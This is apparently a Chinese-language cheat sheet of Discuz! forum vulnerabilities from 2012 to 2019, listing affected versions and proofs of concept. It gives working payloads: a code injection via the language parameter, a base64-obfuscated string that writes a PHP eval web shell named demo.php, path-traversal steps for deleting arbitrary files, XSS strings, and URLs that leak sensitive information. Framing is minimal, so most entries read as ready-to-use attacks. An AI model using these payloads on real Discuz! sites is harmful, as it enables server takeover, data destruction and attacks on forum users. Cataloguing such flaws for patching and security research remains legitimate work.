Discuz ML! V3.X 代碼注入
Date 2019 類型 代碼注入導致RCE 影響范圍 Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org
poc
_language=sc'.phpinfo().';
SSV-90861
Date:
2012
類型:
敏感信息泄露
影響范圍:
DZ x2.5
POC:
http://www.xx.xx/uc_server/control/admin/db.php http://www.xx.xx/source/plugin/myrepeats/table/table_myrepeats.php http://www.xx.xx/install/include/install_lang.php
Discuz! X2.5 遠程代碼執行
Date: 2012 類型: RCE 前置條件: (1).注冊任意賬戶 (2).登陸用戶,發表blog日志(注意是日志) (3).添加圖片,選擇網絡圖片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} (4).訪問日志,論壇根目錄下生成demo.php,一句發密碼c 影響范圍: v2.5
Discuz!X2/2.5弱口令破解漏洞
Date: 2013 類型: 登錄界面暴力破解 影響范圍: Discuz!X2/2.5
ssvid-93588
Date: 2014 類型: 任意文件刪除
前置條件:
(1)登陸DZ前台
(2)請求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就會變為../../../test.txt
(3)構造請求向home.php?mod=spacecp&ac=profile&op=base上傳文件(普通圖片即可)
請求后文件被刪除
影響范圍: version<=3.4
SSV-96608
Date: 2014.10 類型: 前台任意文件刪除 影響范圍:
SSV-89024
Date: 2015.1 類型: Discuz X2.5 /source/class/class_image.php 命令執行漏洞 影響范圍: Discuz X2.5
Discuz! X系列遠程代碼執行漏洞
Date: 2015.8 類型: RCE + XML反序列化 前置條件:
訪問:/api/uc.php
影響范圍:
SSV-91183
Date: 2016.3 類型: SSRF 影響范圍: Discuz! X2 X3
POC:
http://www.internetblog.cn/archives/6068.html?mip
CVE-2018-14729
Date: 2018.8 類型: 遠程代碼執行 前置條件: 登錄后台 影響范圍: Discuz! 1.5-2.5
Discuz Discuz!X ≤3.4 任意文件刪除漏洞分析 Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞 SQL注入及跨站腳本漏洞。 moodwall.inc.php 發表心情處直接插入html代碼 code 區域 "><script>alert(/xss/)</script> Discuz! X1某頁面存在XSS漏洞 簡要描述: 頁面對取到的參數沒有過濾,直接echo到了html里 詳細說明: api/db/dbbak.php頁面,對$apptype缺少必要的過濾,調用api_msg()函數時直接將$apptype echo到了html中。 漏洞證明: http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22